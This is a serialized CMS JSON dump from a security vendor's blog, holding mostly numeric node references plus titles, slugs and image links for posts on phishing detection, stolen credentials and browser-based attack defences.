Type":173},{},[],{"data":46010,"content":46011,"nodeType":178},{},[46012],{"data":46013,"marks":46014,"value":24891,"nodeType":173},{},[],{"data":46016,"content":46017,"nodeType":231},{},[],{"data":46019,"content":46020,"nodeType":169},{},[46021],{"data":46022,"marks":46023,"value":24901,"nodeType":173},{},[],{"data":46025,"content":46026,"nodeType":235},{},[46027],{"data":46028,"marks":46029,"value":24096,"nodeType":173},{},[],{"data":46031,"content":46032,"nodeType":178},{},[46033],{"data":46034,"marks":46035,"value":24914,"nodeType":173},{},[],{"data":46037,"content":46038,"nodeType":178},{},[46039],{"data":46040,"marks":46041,"value":24921,"nodeType":173},{},[],{"data":46043,"content":46044,"nodeType":178},{},[46045,46048,46056],{"data":46046,"marks":46047,"value":24928,"nodeType":173},{},[],{"data":46049,"content":46052,"nodeType":1698},{"target":46050},{"sys":46051},{"id":24933,"type":317,"linkType":318},[46053],{"data":46054,"marks":46055,"value":24938,"nodeType":173},{},[],{"data":46057,"marks":46058,"value":24942,"nodeType":173},{},[],{"data":46060,"content":46061,"nodeType":235},{},[46062],{"data":46063,"marks":46064,"value":24287,"nodeType":173},{},[],{"data":46066,"content":46067,"nodeType":178},{},[46068,46071,46079],{"data":46069,"marks":46070,"value":24955,"nodeType":173},{},[],{"data":46072,"content":46075,"nodeType":1698},{"target":46073},{"sys":46074},{"id":2489,"type":317,"linkType":318},[46076],{"data":46077,"marks":46078,"value":24964,"nodeType":173},{},[],{"data":46080,"marks":46081,"value":24968,"nodeType":173},{},[],{"data":46083,"content":46086,"nodeType":312},{"target":46084},{"sys":46085},{"id":18589,"type":317,"linkType":318},[],{"data":46088,"content":46089,"nodeType":178},{},[46090],{"data":46091,"marks":46092,"value":24980,"nodeType":173},{},[],{"data":46094,"content":46095,"nodeType":250},{},[46096,46105,46114],{"data":46097,"content":46098,"nodeType":254},{},[46099],{"data":46100,"content":46101,"nodeType":178},{},[46102],{"data":46103,"marks":46104,"value":24993,"nodeType":173},{},[],{"data":46106,"content":46107,"nodeType":254},{},[46108],{"data":46109,"content":46110,"nodeType":178},{},[46111],{"data":46112,"marks":46113,"value":25003,"nodeType":173},{},[],{"data":46115,"content":46116,"nodeType":254},{},[46117],{"data":46118,"content":46119,"nodeType":178},{},[46120],{"data":46121,"marks":46122,"value":25013,"nodeType":173},{},[],{"data":46124,"content":46125,"nodeType":178},{},[46126,46129,46137],{"data":46127,"marks":46128,"value":25020,"nodeType":173},{},[],{"data":46130,"content":46133,"nodeType":1698},{"target":46131},{"sys":46132},{"id":2489,"type":317,"linkType":318},[46134],{"data":46135,"marks":46136,"value":24600,"nodeType":173},{},[],{"data":46138,"marks":46139,"value":1477,"nodeType":173},{},[],{"data":46141,"content":46142,"nodeType":231},{},[],{"data":46144,"content":46145,"nodeType":169},{},[46146],{"data":46147,"marks":46148,"value":25041,"nodeType":173},{},[],{"data":46150,"content":46151,"nodeType":235},{},[46152],{"data":46153,"marks":46154,"value":24096,"nodeType":173},{},[],{"data":46156,"content":46157,"nodeType":178},{},[46158],{"data":46159,"marks":46160,"value":25054,"nodeType":173},{},[],{"data":46162,"content":46163,"nodeType":178},{},[46164,46167,46175],{"data":46165,"marks":46166,"value":25061,"nodeType":173},{},[],{"data":46168,"content":46171,"nodeType":1698},{"target":46169},{"sys":46170},{"id":25066,"type":317,"linkType":318},[46172],{"data":46173,"marks":46174,"value":25071,"nodeType":173},{},[],{"data":46176,"marks":46177,"value":25075,"nodeType":173},{},[],{"data":46179,"content":46180,"nodeType":235},{},[46181],{"data":46182,"marks":46183,"value":24287,"nodeType":173},{},[],{"data":46185,"content":46186,"nodeType":178},{},[46187,46190,46194],{"data":46188,"marks":46189,"value":25088,"nodeType":173},{},[],{"data":46191,"marks":46192,"value":25093,"nodeType":173},{},[46193],{"type":370},{"data":46195,"marks":46196,"value":1477,"nodeType":173},{},[],{"data":46198,"content":46201,"nodeType":312},{"target":46199},{"sys":46200},{"id":25101,"type":317,"linkType":318},[],{"data":46203,"content":46204,"nodeType":178},{},[46205],{"data":46206,"marks":46207,"value":25109,"nodeType":173},{},[],{"data":46209,"content":46210,"nodeType":178},{},[46211],{"data":46212,"marks":46213,"value":25116,"nodeType":173},{},[],{"data":46215,"content":46216,"nodeType":178},{},[46217,46220,46228],{"data":46218,"marks":46219,"value":25123,"nodeType":173},{},[],{"data":46221,"content":46224,"nodeType":1698},{"target":46222},{"sys":46223},{"id":25128,"type":317,"linkType":318},[46225],{"data":46226,"marks":46227,"value":24433,"nodeType":173},{},[],{"data":46229,"marks":46230,"value":1477,"nodeType":173},{},[],{"data":46232,"content":46233,"nodeType":231},{},[],{"data":46235,"content":46236,"nodeType":169},{},[46237],{"data":46238,"marks":46239,"value":2824,"nodeType":173},{},[],{"data":46241,"content":46242,"nodeType":178},{},[46243],{"data":46244,"marks":46245,"value":25151,"nodeType":173},{},[],{"data":46247,"content":46248,"nodeType":178},{},[46249],{"data":46250,"marks":46251,"value":25158,"nodeType":173},{},[],{"data":46253,"content":46254,"nodeType":178},{},[46255,46258,46264,46267,46273],{"data":46256,"marks":46257,"value":25165,"nodeType":173},{},[],{"data":46259,"content":46260,"nodeType":186},{"uri":2862},[46261],{"data":46262,"marks":46263,"value":2865,"nodeType":173},{},[],{"data":46265,"marks":46266,"value":25175,"nodeType":173},{},[],{"data":46268,"content":46269,"nodeType":186},{"uri":2886},[46270],{"data":46271,"marks":46272,"value":2889,"nodeType":173},{},[],{"data":46274,"marks":46275,"value":1477,"nodeType":173},{},[],{"entries":46277},{"inline":46278,"hyperlink":46279,"block":46340},[],[46280,46284,46286,46290,46294,46298,46300,46304,46306,46308,46312,46316,46320,46322,46326,46330,46332,46336],{"sys":46281,"__typename":1528,"title":46282,"slug":46283},{"id":24126},"Introducing our guide to phishing detection evasion techniques","phishing-detection-evasion-launch",{"sys":46285,"__typename":1528,"title":41689,"slug":41692},{"id":24155},{"sys":46287,"__typename":1528,"title":46288,"slug":46289},{"id":24168},"How Push stopped a high risk LinkedIn spear-phishing attack against a company exec","how-push-stopped-a-high-risk-linkedin-spear-phishing-attack",{"sys":46291,"__typename":1528,"title":46292,"slug":46293},{"id":24196},"Analyzing the latest Sneaky2FA Browser-in-the-Browser phishing page","analyzing-the-latest-sneaky2fa-phishing-page",{"sys":46295,"__typename":1528,"title":46296,"slug":46297},{"id":24428},"Introducing Push Detections: Equipping SecOps and IR teams to stop browser-based attacks","introducing-push-detections",{"sys":46299,"__typename":6655,"title":6671,"slug":6672,"articleId":6673},{"id":2215},{"sys":46301,"__typename":1528,"title":46302,"slug":46303},{"id":24631},"6 breaches in 5 months: Why attackers are targeting Jira with stolen credentials","why-attackers-are-targeting-jira-with-stolen-credentials",{"sys":46305,"__typename":1528,"title":1480,"slug":1483},{"id":519},{"sys":46307,"__typename":1528,"title":4774,"slug":4777},{"id":3979},{"sys":46309,"__typename":1528,"title":46310,"slug":46311},{"id":24713},"Eliminate false positives with verified stolen credential detections using Push","verified-stolen-credential-detection",{"sys":46313,"__typename":1528,"title":46314,"slug":46315},{"id":24759},"Introducing Push password enforcement — for when weak passwords are still plaguing you","introducing-strong-password-enforcement",{"sys":46317,"__typename":1528,"title":46318,"slug":46319},{"id":24787},"No more hard simple problems: Enforce MFA on third-party apps with Push","enforce-mfa-on-third-party-apps",{"sys":46321,"__typename":6655,"title":6676,"slug":6677,"articleId":6678},{"id":2405},{"sys":46323,"__typename":1528,"title":46324,"slug":46325},{"id":24875},"Don’t let attackers find the keys to your kingdom in a personal password manager","stop-users-saving-corp-creds-into-personal-password-managers",{"sys":46327,"__typename":1528,"title":46328,"slug":46329},{"id":24933},"Guide to secure browser extension deployment","guide-to-secure-browser-extension-deployment",{"sys":46331,"__typename":6655,"title":6696,"slug":6697,"articleId":6698},{"id":2489},{"sys":46333,"__typename":1528,"title":46334,"slug":46335},{"id":25066},"Scattered Spider: TTP evolution in 2025","scattered-spider-ttp-evolution-in-2025",{"sys":46337,"__typename":1528,"title":46338,"slug":46339},{"id":25128},"A simple, browser-based way to protect your help desk against social engineering","employee-identity-verification-codes-release",[46341,46366,46370,46377,46384,46388,46395,46401,46408],{"sys":46342,"__typename":5311,"content":46343,"name":46365,"title":118},{"id":24064},{"json":46344},{"nodeType":165,"data":46345,"content":46346},{},[46347],{"nodeType":178,"data":46348,"content":46349},{},[46350,46354,46362],{"nodeType":173,"value":46351,"marks":46352,"data":46353},"Learn more about these attacks and the rise of the Scattered Lapsus$ Hunters supergroup in our ",[],{},{"nodeType":186,"data":46355,"content":46357},{"uri":46356},"/blog/scattered-lapsus-hunters/",[46358],{"nodeType":173,"value":46359,"marks":46360,"data":46361},"recent blog post",[],{},{"nodeType":173,"value":1477,"marks":46363,"data":46364},[],{},"Scattered Lapsus$ Hunters blog promo",{"sys":46367,"__typename":5434,"title":46368,"arcadeDemoUrl":46369,"playText":5437},{"id":24332},"Detect and respond to browser-based attacks","https://demo.arcade.software/FDPVuWkgezE91MicpCx7?embed",{"sys":46371,"__typename":5345,"title":46372,"caption":118,"layoutMode":118,"file":46373},{"id":18898},"Detection details slideout w/ timeline etc. - KB 10136",{"url":46374,"width":46375,"height":46376},"https://images.ctfassets.net/y1cdw1ablpvd/6qMAmnkXcJpsp19n7YANTV/b89b76929cc68387121c60ee3c48b0f2/detection_enrichment_example.png",977,758,{"sys":46378,"__typename":5345,"title":46379,"caption":118,"layoutMode":118,"file":46380},{"id":24520},"Clickfix detection block page",{"url":46381,"width":46382,"height":46383},"https://images.ctfassets.net/y1cdw1ablpvd/5QM8JNSvpRk1y7eoYw7CLw/ae9e6aa8b27c067f88cfb600c57c0a34/malicious_copypaste_block_example.png",2568,1604,{"sys":46385,"__typename":5434,"title":46386,"arcadeDemoUrl":46387,"playText":5437},{"id":21021},"ClickFix Feature Release","https://demo.arcade.software/qhzGMAx2q3b6IRlHqBsB?embed",{"sys":46389,"__typename":5345,"title":46390,"caption":118,"layoutMode":118,"file":46391},{"id":24808},"MFA enforcement banner - KB 10121",{"url":46392,"width":46393,"height":46394},"https://images.ctfassets.net/y1cdw1ablpvd/1H45Qj9vCfyQTCMxs8ypU5/6eeb494d24a904058d5635f290569889/Screenshot_2024-12-09_at_1.58.57_PM.png",1438,785,{"sys":46396,"__typename":5345,"title":46397,"caption":118,"layoutMode":118,"file":46398},{"id":24862},"Password protection block screen for end-users - KB 10109",{"url":46399,"width":11967,"height":46400},"https://images.ctfassets.net/y1cdw1ablpvd/5y1AiJEoLP6BveEJwDKhAL/dd2e00b920626ac1dd413b1358d476d7/password_protection_block_screen_example.png",827,{"sys":46402,"__typename":5345,"title":46403,"caption":118,"layoutMode":118,"file":46404},{"id":18589},"Extension enumeration - KB 10138",{"url":46405,"width":46406,"height":46407},"https://images.ctfassets.net/y1cdw1ablpvd/1dByBmqYgpC9KhPkZoUbGN/0d65ee5ce5abceed6e8538319d83d761/extension_data_table_20251216.png",1480,826,{"sys":46409,"__typename":5345,"title":46410,"caption":118,"layoutMode":118,"file":46411},{"id":25101},"Employee verification codes - Labs - for June 2025 release notes",{"url":46412,"width":46413,"height":46414},"https://images.ctfassets.net/y1cdw1ablpvd/4es73ojyk572RJHuSrAahL/91be55af18fbcfb5f2fc3067497c9746/employee_verification_code_annotated.png",472,241,"content:blog:taking-the-fight-to-attackers-top-features-of-2025.json","blog/taking-the-fight-to-attackers-top-features-of-2025.json","blog/taking-the-fight-to-attackers-top-features-of-2025",{"_path":46419,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":46420,"ogImage":118,"summary":46422,"title":40210,"subtitle":118,"metaTitle":46433,"synopsis":40211,"hashTags":118,"publishedDate":40212,"slug":40213,"tagsCollection":46434,"relatedBlogPostsCollection":46440,"authorsCollection":48538,"content":48542,"_id":49209,"_type":5439,"_source":5440,"_file":49210,"_stem":49211,"_extension":5439},"/blog/2025-top-phishing-trends",{"id":39543,"publishedAt":46421},"2026-02-05T12:58:46.811Z",{"json":46423},{"data":46424,"content":46425,"nodeType":165},{},[46426],{"data":46427,"content":46428,"nodeType":178},{},[46429],{"data":46430,"marks":46431,"value":46432,"nodeType":173},{},[],"Phishing attacks changed a lot through 2025. Here's the top trends from this year and what they mean for security teams heading into 2026. \n","Analysing 2025's top phishing trends",{"items":46435},[46436,46438],{"sys":46437,"name":509},{"id":508},{"sys":46439,"name":505},{"id":504},{"items":46441},[46442,47190,47710],{"__typename":1528,"sys":46443,"content":46444,"title":8598,"synopsis":8599,"hashTags":118,"publishedDate":8600,"slug":8601,"tagsCollection":47180,"authorsCollection":47186},{"id":7748},{"json":46445},{"nodeType":165,"data":46446,"content":46447},{},[46448,46455,46461,46467,46473,46483,46489,46494,46499,46502,46509,46515,46521,46526,46542,46548,46553,46559,46564,46570,46609,46614,46619,46625,46631,46634,46641,46657,46663,46668,46684,46689,46705,46711,46714,46721,46727,46763,46773,46776,46783,46798,46804,46817,46823,46829,46834,46840,46843,46850,46856,46904,46910,46913,46920,46925,46931,46937,46942,46948,46977,46983,46989,46994,47000,47005,47012,47028,47034,47064,47070,47100,47103,47110,47116,47121,47137,47143,47169,47174],{"nodeType":169,"data":46449,"content":46450},{},[46451],{"nodeType":173,"value":7757,"marks":46452,"data":46454},[46453],{"type":370},{},{"nodeType":178,"data":46456,"content":46457},{},[46458],{"nodeType":173,"value":7765,"marks":46459,"data":46460},[],{},{"nodeType":178,"data":46462,"content":46463},{},[46464],{"nodeType":173,"value":7772,"marks":46465,"data":46466},[],{},{"nodeType":178,"data":46468,"content":46469},{},[46470],{"nodeType":173,"value":7779,"marks":46471,"data":46472},[],{},{"nodeType":178,"data":46474,"content":46475},{},[46476,46480],{"nodeType":173,"value":7786,"marks":46477,"data":46479},[46478],{"type":370},{},{"nodeType":173,"value":7791,"marks":46481,"data":46482},[],{},{"nodeType":178,"data":46484,"content":46485},{},[46486],{"nodeType":173,"value":7798,"marks":46487,"data":46488},[],{},{"nodeType":312,"data":46490,"content":46493},{"target":46491},{"sys":46492},{"id":7805,"type":317,"linkType":318},[],{"nodeType":312,"data":46495,"content":46498},{"target":46496},{"sys":46497},{"id":7811,"type":317,"linkType":318},[],{"nodeType":231,"data":46500,"content":46501},{},[],{"nodeType":169,"data":46503,"content":46504},{},[46505],{"nodeType":173,"value":7820,"marks":46506,"data":46508},[46507],{"type":370},{},{"nodeType":178,"data":46510,"content":46511},{},[46512],{"nodeType":173,"value":7828,"marks":46513,"data":46514},[],{},{"nodeType":178,"data":46516,"content":46517},{},[46518],{"nodeType":173,"value":7835,"marks":46519,"data":46520},[],{},{"nodeType":312,"data":46522,"content":46525},{"target":46523},{"sys":46524},{"id":7842,"type":317,"linkType":318},[],{"nodeType":178,"data":46527,"content":46528},{},[46529,46532,46539],{"nodeType":173,"value":7848,"marks":46530,"data":46531},[],{},{"nodeType":186,"data":46533,"content":46534},{"uri":7853},[46535],{"nodeType":173,"value":7856,"marks":46536,"data":46538},[46537],{"type":194},{},{"nodeType":173,"value":7861,"marks":46540,"data":46541},[],{},{"nodeType":178,"data":46543,"content":46544},{},[46545],{"nodeType":173,"value":7868,"marks":46546,"data":46547},[],{},{"nodeType":312,"data":46549,"content":46552},{"target":46550},{"sys":46551},{"id":7875,"type":317,"linkType":318},[],{"nodeType":178,"data":46554,"content":46555},{},[46556],{"nodeType":173,"value":7881,"marks":46557,"data":46558},[],{},{"nodeType":312,"data":46560,"content":46563},{"target":46561},{"sys":46562},{"id":7888,"type":317,"linkType":318},[],{"nodeType":178,"data":46565,"content":46566},{},[46567],{"nodeType":173,"value":7894,"marks":46568,"data":46569},[],{},{"nodeType":250,"data":46571,"content":46572},{},[46573,46582,46591,46600],{"nodeType":254,"data":46574,"content":46575},{},[46576],{"nodeType":178,"data":46577,"content":46578},{},[46579],{"nodeType":173,"value":7907,"marks":46580,"data":46581},[],{},{"nodeType":254,"data":46583,"content":46584},{},[46585],{"nodeType":178,"data":46586,"content":46587},{},[46588],{"nodeType":173,"value":7917,"marks":46589,"data":46590},[],{},{"nodeType":254,"data":46592,"content":46593},{},[46594],{"nodeType":178,"data":46595,"content":46596},{},[46597],{"nodeType":173,"value":7927,"marks":46598,"data":46599},[],{},{"nodeType":254,"data":46601,"content":46602},{},[46603],{"nodeType":178,"data":46604,"content":46605},{},[46606],{"nodeType":173,"value":7937,"marks":46607,"data":46608},[],{},{"nodeType":312,"data":46610,"content":46613},{"target":46611},{"sys":46612},{"id":7944,"type":317,"linkType":318},[],{"nodeType":312,"data":46615,"content":46618},{"target":46616},{"sys":46617},{"id":7950,"type":317,"linkType":318},[],{"nodeType":178,"data":46620,"content":46621},{},[46622],{"nodeType":173,"value":7956,"marks":46623,"data":46624},[],{},{"nodeType":178,"data":46626,"content":46627},{},[46628],{"nodeType":173,"value":7963,"marks":46629,"data":46630},[],{},{"nodeType":231,"data":46632,"content":46633},{},[],{"nodeType":169,"data":46635,"content":46636},{},[46637],{"nodeType":173,"value":7973,"marks":46638,"data":46640},[46639],{"type":370},{},{"nodeType":178,"data":46642,"content":46643},{},[46644,46647,46654],{"nodeType":173,"value":7981,"marks":46645,"data":46646},[],{},{"nodeType":186,"data":46648,"content":46649},{"uri":7986},[46650],{"nodeType":173,"value":7989,"marks":46651,"data":46653},[46652],{"type":194},{},{"nodeType":173,"value":7994,"marks":46655,"data":46656},[],{},{"nodeType":178,"data":46658,"content":46659},{},[46660],{"nodeType":173,"value":8001,"marks":46661,"data":46662},[],{},{"nodeType":312,"data":46664,"content":46667},{"target":46665},{"sys":46666},{"id":8008,"type":317,"linkType":318},[],{"nodeType":178,"data":46669,"content":46670},{},[46671,46674,46681],{"nodeType":173,"value":8014,"marks":46672,"data":46673},[],{},{"nodeType":186,"data":46675,"content":46676},{"uri":1842},[46677],{"nodeType":173,"value":8021,"marks":46678,"data":46680},[46679],{"type":194},{},{"nodeType":173,"value":1477,"marks":46682,"data":46683},[],{},{"nodeType":312,"data":46685,"content":46688},{"target":46686},{"sys":46687},{"id":8032,"type":317,"linkType":318},[],{"nodeType":178,"data":46690,"content":46691},{},[46692,46695,46702],{"nodeType":173,"value":8038,"marks":46693,"data":46694},[],{},{"nodeType":186,"data":46696,"content":46697},{"uri":8043},[46698],{"nodeType":173,"value":8046,"marks":46699,"data":46701},[46700],{"type":194},{},{"nodeType":173,"value":8051,"marks":46703,"data":46704},[],{},{"nodeType":178,"data":46706,"content":46707},{},[46708],{"nodeType":173,"value":8058,"marks":46709,"data":46710},[],{},{"nodeType":231,"data":46712,"content":46713},{},[],{"nodeType":169,"data":46715,"content":46716},{},[46717],{"nodeType":173,"value":8068,"marks":46718,"data":46720},[46719],{"type":370},{},{"nodeType":178,"data":46722,"content":46723},{},[46724],{"nodeType":173,"value":8076,"marks":46725,"data":46726},[],{},{"nodeType":178,"data":46728,"content":46729},{},[46730,46733,46740,46743,46750,46753,46760],{"nodeType":173,"value":8083,"marks":46731,"data":46732},[],{},{"nodeType":186,"data":46734,"content":46735},{"uri":8088},[46736],{"nodeType":173,"value":8091,"marks":46737,"data":46739},[46738],{"type":194},{},{"nodeType":173,"value":933,"marks":46741,"data":46742},[],{},{"nodeType":186,"data":46744,"content":46745},{"uri":8100},[46746],{"nodeType":173,"value":1812,"marks":46747,"data":46749},[46748],{"type":194},{},{"nodeType":173,"value":8107,"marks":46751,"data":46752},[],{},{"nodeType":186,"data":46754,"content":46755},{"uri":8112},[46756],{"nodeType":173,"value":8115,"marks":46757,"data":46759},[46758],{"type":194},{},{"nodeType":173,"value":8120,"marks":46761,"data":46762},[],{},{"nodeType":178,"data":46764,"content":46765},{},[46766,46769],{"nodeType":173,"value":8127,"marks":46767,"data":46768},[],{},{"nodeType":173,"value":8131,"marks":46770,"data":46772},[46771],{"type":370},{},{"nodeType":231,"data":46774,"content":46775},{},[],{"nodeType":169,"data":46777,"content":46778},{},[46779],{"nodeType":173,"value":8142,"marks":46780,"data":46782},[46781],{"type":370},{},{"nodeType":178,"data":46784,"content":46785},{},[46786,46789,46795],{"nodeType":173,"value":8150,"marks":46787,"data":46788},[],{},{"nodeType":186,"data":46790,"content":46791},{"uri":6820},[46792],{"nodeType":173,"value":8157,"marks":46793,"data":46794},[],{},{"nodeType":173,"value":8161,"marks":46796,"data":46797},[],{},{"nodeType":178,"data":46799,"content":46800},{},[46801],{"nodeType":173,"value":8168,"marks":46802,"data":46803},[],{},{"nodeType":178,"data":46805,"content":46806},{},[46807,46810,46814],{"nodeType":173,"value":8175,"marks":46808,"data":46809},[],{},{"nodeType":173,"value":8179,"marks":46811,"data":46813},[46812],{"type":370},{},{"nodeType":173,"value":8184,"marks":46815,"data":46816},[],{},{"nodeType":178,"data":46818,"content":46819},{},[46820],{"nodeType":173,"value":8191,"marks":46821,"data":46822},[],{},{"nodeType":178,"data":46824,"content":46825},{},[46826],{"nodeType":173,"value":8198,"marks":46827,"data":46828},[],{},{"nodeType":312,"data":46830,"content":46833},{"target":46831},{"sys":46832},{"id":8205,"type":317,"linkType":318},[],{"nodeType":178,"data":46835,"content":46836},{},[46837],{"nodeType":173,"value":8211,"marks":46838,"data":46839},[],{},{"nodeType":231,"data":46841,"content":46842},{},[],{"nodeType":169,"data":46844,"content":46845},{},[46846],{"nodeType":173,"value":8221,"marks":46847,"data":46849},[46848],{"type":370},{},{"nodeType":178,"data":46851,"content":46852},{},[46853],{"nodeType":173,"value":8229,"marks":46854,"data":46855},[],{},{"nodeType":250,"data":46857,"content":46858},{},[46859,46868,46877,46886,46895],{"nodeType":254,"data":46860,"content":46861},{},[46862],{"nodeType":178,"data":46863,"content":46864},{},[46865],{"nodeType":173,"value":8242,"marks":46866,"data":46867},[],{},{"nodeType":254,"data":46869,"content":46870},{},[46871],{"nodeType":178,"data":46872,"content":46873},{},[46874],{"nodeType":173,"value":8252,"marks":46875,"data":46876},[],{},{"nodeType":254,"data":46878,"content":46879},{},[46880],{"nodeType":178,"data":46881,"content":46882},{},[46883],{"nodeType":173,"value":8262,"marks":46884,"data":46885},[],{},{"nodeType":254,"data":46887,"content":46888},{},[46889],{"nodeType":178,"data":46890,"content":46891},{},[46892],{"nodeType":173,"value":8272,"marks":46893,"data":46894},[],{},{"nodeType":254,"data":46896,"content":46897},{},[46898],{"nodeType":178,"data":46899,"content":46900},{},[46901],{"nodeType":173,"value":8282,"marks":46902,"data":46903},[],{},{"nodeType":178,"data":46905,"content":46906},{},[46907],{"nodeType":173,"value":8289,"marks":46908,"data":46909},[],{},{"nodeType":231,"data":46911,"content":46912},{},[],{"nodeType":169,"data":46914,"content":46915},{},[46916],{"nodeType":173,"value":8299,"marks":46917,"data":46919},[46918],{"type":370},{},{"nodeType":312,"data":46921,"content":46924},{"target":46922},{"sys":46923},{"id":8307,"type":317,"linkType":318},[],{"nodeType":178,"data":46926,"content":46927},{},[46928],{"nodeType":173,"value":8313,"marks":46929,"data":46930},[],{},{"nodeType":178,"data":46932,"content":46933},{},[46934],{"nodeType":173,"value":8320,"marks":46935,"data":46936},[],{},{"nodeType":312,"data":46938,"content":46941},{"target":46939},{"sys":46940},{"id":8327,"type":317,"linkType":318},[],{"nodeType":178,"data":46943,"content":46944},{},[46945],{"nodeType":173,"value":8333,"marks":46946,"data":46947},[],{},{"nodeType":250,"data":46949,"content":46950},{},[46951,46964],{"nodeType":254,"data":46952,"content":46953},{},[46954],{"nodeType":178,"data":46955,"content":46956},{},[46957,46961],{"nodeType":173,"value":8346,"marks":46958,"data":46960},[46959],{"type":370},{},{"nodeType":173,"value":8351,"marks":46962,"data":46963},[],{},{"nodeType":254,"data":46965,"content":46966},{},[46967],{"nodeType":178,"data":46968,"content":46969},{},[46970,46974],{"nodeType":173,"value":8361,"marks":46971,"data":46973},[46972],{"type":370},{},{"nodeType":173,"value":8366,"marks":46975,"data":46976},[],{},{"nodeType":178,"data":46978,"content":46979},{},[46980],{"nodeType":173,"value":8373,"marks":46981,"data":46982},[],{},{"nodeType":178,"data":46984,"content":46985},{},[46986],{"nodeType":173,"value":8380,"marks":46987,"data":46988},[],{},{"nodeType":312,"data":46990,"content":46993},{"target":46991},{"sys":46992},{"id":8387,"type":317,"linkType":318},[],{"nodeType":178,"data":46995,"content":46996},{},[46997],{"nodeType":173,"value":8393,"marks":46998,"data":46999},[],{},{"nodeType":312,"data":47001,"content":47004},{"target":47002},{"sys":47003},{"id":8400,"type":317,"linkType":318},[],{"nodeType":235,"data":47006,"content":47007},{},[47008],{"nodeType":173,"value":8406,"marks":47009,"data":47011},[47010],{"type":370},{},{"nodeType":178,"data":47013,"content":47014},{},[47015,47018,47025],{"nodeType":173,"value":8414,"marks":47016,"data":47017},[],{},{"nodeType":186,"data":47019,"content":47020},{"uri":8419},[47021],{"nodeType":173,"value":8422,"marks":47022,"data":47024},[47023],{"type":194},{},{"nodeType":173,"value":8427,"marks":47026,"data":47027},[],{},{"nodeType":178,"data":47029,"content":47030},{},[47031],{"nodeType":173,"value":8434,"marks":47032,"data":47033},[],{},{"nodeType":250,"data":47035,"content":47036},{},[47037,47046,47055],{"nodeType":254,"data":47038,"content":47039},{},[47040],{"nodeType":178,"data":47041,"content":47042},{},[47043],{"nodeType":173,"value":8447,"marks":47044,"data":47045},[],{},{"nodeType":254,"data":47047,"content":47048},{},[47049],{"nodeType":178,"data":47050,"content":47051},{},[47052],{"nodeType":173,"value":8457,"marks":47053,"data":47054},[],{},{"nodeType":254,"data":47056,"content":47057},{},[47058],{"nodeType":178,"data":47059,"content":47060},{},[47061],{"nodeType":173,"value":8467,"marks":47062,"data":47063},[],{},{"nodeType":178,"data":47065,"content":47066},{},[47067],{"nodeType":173,"value":8474,"marks":47068,"data":47069},[],{},{"nodeType":250,"data":47071,"content":47072},{},[47073,47082,47091],{"nodeType":254,"data":47074,"content":47075},{},[47076],{"nodeType":178,"data":47077,"content":47078},{},[47079],{"nodeType":173,"value":8487,"marks":47080,"data":47081},[],{},{"nodeType":254,"data":47083,"content":47084},{},[47085],{"nodeType":178,"data":47086,"content":47087},{},[47088],{"nodeType":173,"value":8497,"marks":47089,"data":47090},[],{},{"nodeType":254,"data":47092,"content":47093},{},[47094],{"nodeType":178,"data":47095,"content":47096},{},[47097],{"nodeType":173,"value":8507,"marks":47098,"data":47099},[],{},{"nodeType":231,"data":47101,"content":47102},{},[],{"nodeType":169,"data":47104,"content":47105},{},[47106],{"nodeType":173,"value":8517,"marks":47107,"data":47109},[47108],{"type":370},{},{"nodeType":178,"data":47111,"content":47112},{},[47113],{"nodeType":173,"value":8525,"marks":47114,"data":47115},[],{},{"nodeType":312,"data":47117,"content":47120},{"target":47118},{"sys":47119},{"id":8532,"type":317,"linkType":318},[],{"nodeType":178,"data":47122,"content":47123},{},[47124,47127,47134],{"nodeType":173,"value":8538,"marks":47125,"data":47126},[],{},{"nodeType":186,"data":47128,"content":47129},{"uri":6820},[47130],{"nodeType":173,"value":8545,"marks":47131,"data":47133},[47132],{"type":194},{},{"nodeType":173,"value":8550,"marks":47135,"data":47136},[],{},{"nodeType":178,"data":47138,"content":47139},{},[47140],{"nodeType":173,"value":8557,"marks":47141,"data":47142},[],{},{"nodeType":178,"data":47144,"content":47145},{},[47146,47149,47156,47159,47166],{"nodeType":173,"value":1451,"marks":47147,"data":47148},[],{},{"nodeType":186,"data":47150,"content":47151},{"uri":1456},[47152],{"nodeType":173,"value":1459,"marks":47153,"data":47155},[47154],{"type":194},{},{"nodeType":173,"value":1464,"marks":47157,"data":47158},[],{},{"nodeType":186,"data":47160,"content":47161},{"uri":1469},[47162],{"nodeType":173,"value":1472,"marks":47163,"data":47165},[47164],{"type":194},{},{"nodeType":173,"value":1477,"marks":47167,"data":47168},[],{},{"nodeType":312,"data":47170,"content":47173},{"target":47171},{"sys":47172},{"id":8590,"type":317,"linkType":318},[],{"nodeType":178,"data":47175,"content":47176},{},[47177],{"nodeType":173,"value":37,"marks":47178,"data":47179},[],{},{"items":47181},[47182,47184],{"sys":47183,"name":505},{"id":504},{"sys":47185,"name":509},{"id":508},{"items":47187},[47188],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":47189},{"url":8615},{"__typename":1528,"sys":47191,"content":47192,"title":42282,"synopsis":42283,"hashTags":118,"publishedDate":41691,"slug":42284,"tagsCollection":47700,"authorsCollection":47706},{"id":41705},{"json":47193},{"data":47194,"content":47195,"nodeType":165},{},[47196,47202,47208,47214,47219,47225,47228,47235,47241,47247,47253,47258,47264,47269,47275,47280,47286,47291,47317,47323,47328,47334,47339,47345,47350,47356,47395,47398,47405,47411,47417,47423,47428,47431,47438,47444,47460,47465,47470,47475,47481,47486,47491,47507,47510,47517,47533,47538,47544,47560,47567,47573,47579,47585,47601,47608,47614,47619,47622,47629,47635,47641,47644,47651,47657,47663,47689,47694],{"data":47197,"content":47198,"nodeType":178},{},[47199],{"data":47200,"marks":47201,"value":41716,"nodeType":173},{},[],{"data":47203,"content":47204,"nodeType":178},{},[47205],{"data":47206,"marks":47207,"value":41723,"nodeType":173},{},[],{"data":47209,"content":47210,"nodeType":178},{},[47211],{"data":47212,"marks":47213,"value":41730,"nodeType":173},{},[],{"data":47215,"content":47218,"nodeType":312},{"target":47216},{"sys":47217},{"id":41735,"type":317,"linkType":318},[],{"data":47220,"content":47221,"nodeType":178},{},[47222],{"data":47223,"marks":47224,"value":41743,"nodeType":173},{},[],{"data":47226,"content":47227,"nodeType":231},{},[],{"data":47229,"content":47230,"nodeType":169},{},[47231],{"data":47232,"marks":47233,"value":41754,"nodeType":173},{},[47234],{"type":370},{"data":47236,"content":47237,"nodeType":178},{},[47238],{"data":47239,"marks":47240,"value":41761,"nodeType":173},{},[],{"data":47242,"content":47243,"nodeType":178},{},[47244],{"data":47245,"marks":47246,"value":41768,"nodeType":173},{},[],{"data":47248,"content":47249,"nodeType":178},{},[4725